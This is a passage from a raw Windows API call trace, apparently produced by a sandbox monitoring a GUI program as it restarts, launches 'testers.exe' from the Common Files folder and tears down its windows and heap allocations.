wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.555] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.555] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.555] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.555] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.555] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.555] GetWindowLongW (hWnd=0x60174, nIndex=-20) returned 256 [0260.555] NtdllDialogWndProc_W () returned 0x1 [0260.555] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.555] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.555] GetClientRect (in: hWnd=0x60174, lpRect=0x7dfb00 | out: lpRect=0x7dfb00) returned 1 [0260.556] GetCursorPos (in: lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10*(x=799, y=511)) returned 1 [0260.556] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfb10 | out: lpPoint=0x7dfb10) returned 1 [0260.556] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0260.556] SetCursor (hCursor=0x10003) returned 0x10003 [0260.556] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.556] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.556] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.556] NtdllDialogWndProc_W () returned 0x0 [0260.556] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.556] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.556] IsDialogMessageW (hDlg=0x60174, lpMsg=0x7dfdb4) returned 1 [0260.557] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.557] NtdllDialogWndProc_W () returned 0x1 [0260.557] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.557] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.557] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.557] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.557] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.557] NtdllDialogWndProc_W () returned 0x0 [0260.557] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetSysColor (nIndex=15) returned 0xf0f0f0 [0260.558] SetBkColor (hdc=0x3e0101d8, color=0xf0f0f0) returned 0xf0f0f0 [0260.558] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.558] NtdllDialogWndProc_W () returned 0x0 [0260.558] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.558] GetWindowLongW (hWnd=0x8014a, nIndex=-21) returned 3 [0260.558] NtdllDialogWndProc_W () returned 0x0 [0260.570] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 1 [0260.570] TranslateAcceleratorW (hWnd=0x60174, hAccTable=0x500d5, lpMsg=0x7dfdb4) returned 0 [0260.570] TranslateMessage (lpMsg=0x7dfdb4) returned 0 [0260.570] DispatchMessageW (lpMsg=0x7dfdb4) returned 0x0 [0260.570] GetForegroundWindow () returned 0x60174 [0260.571] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.571] GetCursorPos (in: lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0*(x=799, y=511)) returned 1 [0260.571] ScreenToClient (in: hWnd=0x60174, lpPoint=0x7dfbf0 | out: lpPoint=0x7dfbf0) returned 1 [0260.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x24) returned 0xdedae0 [0260.571] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda4a0 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a78 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a48 [0260.572] GetAsyncKeyState (vKey=1) returned 1 [0260.572] GetAsyncKeyState (vKey=2) returned 0 [0260.572] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a58 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.572] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0260.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xddc918 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5810 [0260.572] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a58 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xc07618 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a68 [0260.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc07618 | out: hHeap=0xbc0000) returned 1 [0260.572] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a68 | out: hHeap=0xbc0000) returned 1 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a68 [0260.572] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xe23818 [0260.573] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe23818 | out: hHeap=0xbc0000) returned 1 [0260.573] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a68 | out: hHeap=0xbc0000) returned 1 [0260.573] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xe56aa0 [0260.573] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32a58 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdda470 [0260.573] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x42) returned 0xdf5b70 [0260.573] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0260.573] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x2a) returned 0xe49db8 [0260.573] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xe49db8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0260.573] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x7dfa00*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x7df9c8 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x7df9c8*(hProcess=0x610, hThread=0x5dc, dwProcessId=0x670, dwThreadId=0x7a0)) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdf5b70 | out: hHeap=0xbc0000) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe49db8 | out: hHeap=0xbc0000) returned 1 [0260.579] CloseHandle (hObject=0x5dc) returned 1 [0260.579] CloseHandle (hObject=0x610) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda470 | out: hHeap=0xbc0000) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.579] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe56aa0 | out: hHeap=0xbc0000) returned 1 [0260.579] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde5810 | out: hHeap=0xbc0000) returned 1 [0260.579] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc918 | out: hHeap=0xbc0000) returned 1 [0260.579] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0260.579] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.579] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a58 [0260.579] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20248 [0260.579] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc918 [0260.579] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a68 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc918 | out: hHeap=0xbc0000) returned 1 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddc918 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe20068 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a58 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe204c8 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32a88 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcb58 | out: hHeap=0xbc0000) returned 1 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe203d8 [0260.580] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xddcb58 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe20068 | out: hHeap=0xbc0000) returned 1 [0260.580] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32a58 | out: hHeap=0xbc0000) returned 1 [0260.580] LockWindowUpdate (hWndLock=0x0) returned 0 [0260.580] DestroyWindow (hWnd=0x40172) returned 1 [0260.580] NtdllDefWindowProc_W () returned 0x0 [0260.581] KillTimer (hWnd=0x40172, uIDEvent=0x1) returned 1 [0260.581] Shell_NotifyIconW (dwMessage=0x2, lpData=0x7df7d0) returned 1 [0260.619] DestroyWindow (hWnd=0x60174) returned 1 [0260.619] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.619] NtdllDialogWndProc_W () returned 0x0 [0260.619] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.619] NtdllDialogWndProc_W () returned 0x0 [0260.645] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.645] NtdllDialogWndProc_W () returned 0x0 [0260.650] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.650] NtdllDialogWndProc_W () returned 0x1 [0260.651] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.651] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.651] NtdllDialogWndProc_W () returned 0x0 [0260.651] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.652] NtdllDialogWndProc_W () returned 0x0 [0260.652] NtdllDefWindowProc_W () returned 0x0 [0260.652] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.652] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.652] InvalidateRect (hWnd=0x60174, lpRect=0x0, bErase=1) returned 1 [0260.652] DestroyAcceleratorTable (hAccel=0x500d5) returned 1 [0260.653] DeleteObject (ho=0x4b0a01cf) returned 1 [0260.653] DestroyWindow (hWnd=0x8014a) returned 1 [0260.653] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.653] NtdllDialogWndProc_W () returned 0x0 [0260.653] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ed8 | out: hHeap=0xbc0000) returned 1 [0260.653] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f28 | out: hHeap=0xbc0000) returned 1 [0260.653] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ec0 | out: hHeap=0xbc0000) returned 1 [0260.653] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f18 | out: hHeap=0xbc0000) returned 1 [0260.653] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c98 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31df8 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff150 | out: hHeap=0xbc0000) returned 1 [0260.654] DestroyWindow (hWnd=0x40168) returned 1 [0260.654] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.654] NtdllDialogWndProc_W () returned 0x0 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f38 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f88 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f20 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f78 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f08 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f68 | out: hHeap=0xbc0000) returned 1 [0260.654] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff1f8 | out: hHeap=0xbc0000) returned 1 [0260.654] DeleteObject (ho=0xb10a0617) returned 1 [0260.654] DestroyWindow (hWnd=0x4016a) returned 1 [0260.655] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.655] NtdllDialogWndProc_W () returned 0x0 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f80 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c18 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8130 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c28 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80e8 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32138 | out: hHeap=0xbc0000) returned 1 [0260.655] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff2a0 | out: hHeap=0xbc0000) returned 1 [0260.655] DeleteObject (ho=0x1b0a01e8) returned 1 [0260.655] DestroyWindow (hWnd=0x4015e) returned 1 [0260.655] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.655] NtdllDialogWndProc_W () returned 0x0 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcab0 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fc8 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda590 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fa8 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc948 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c78 | out: hHeap=0xbc0000) returned 1 [0260.656] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff348 | out: hHeap=0xbc0000) returned 1 [0260.656] DeleteObject (ho=0x1f0a01f7) returned 1 [0260.656] DestroyWindow (hWnd=0x4010a) returned 1 [0260.656] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.656] NtdllDialogWndProc_W () returned 0x0 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca80 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c88 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddca68 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32c38 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdda2f0 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bf8 | out: hHeap=0xbc0000) returned 1 [0260.657] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff3f0 | out: hHeap=0xbc0000) returned 1 [0260.657] DeleteObject (ho=0x2a0a01d3) returned 1 [0260.657] DestroyWindow (hWnd=0x500a2) returned 1 [0260.657] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.657] NtdllDialogWndProc_W () returned 0x0 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddcae0 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ca8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8028 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32b18 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80a0 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32bd8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcff498 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ad8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32058 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32be8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f98 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f38 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ea8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ef8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e90 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ee8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e78 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ed8 | out: hHeap=0xbc0000) returned 1 [0260.658] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e60 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ec8 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e48 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31eb8 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e30 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ea8 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e18 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e98 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7e00 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e88 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7de8 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e78 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7dd0 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e68 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7db8 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e58 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7da0 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e48 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d88 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e38 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d70 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e28 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d58 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31e18 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d40 | out: hHeap=0xbc0000) returned 1 [0260.659] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31de8 | out: hHeap=0xbc0000) returned 1 [0260.660] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdf97f8 | out: hHeap=0xbc0000) returned 1 [0260.660] KillTimer (hWnd=0x0, uIDEvent=0x7fd1) returned 1 [0260.660] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f08 | out: hHeap=0xbc0000) returned 1 [0260.660] NtdllDialogWndProc_W () returned 0x0 [0260.674] GetWindowLongW (hWnd=0x60174, nIndex=-21) returned 0 [0260.674] NtdllDialogWndProc_W () returned 0x0 [0260.674] DeleteObject (ho=0x1b100273) returned 1 [0260.674] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc8d0 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc900 | out: hHeap=0xbc0000) returned 1 [0260.675] DeleteObject (ho=0x2e1006f6) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc8b8 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc888 | out: hHeap=0xbc0000) returned 1 [0260.675] DeleteObject (ho=0x18100718) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f68 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cc8 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32ac8 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xddc6f0 | out: hHeap=0xbc0000) returned 1 [0260.675] HeapFree (in: hHeap=0xbc0000, 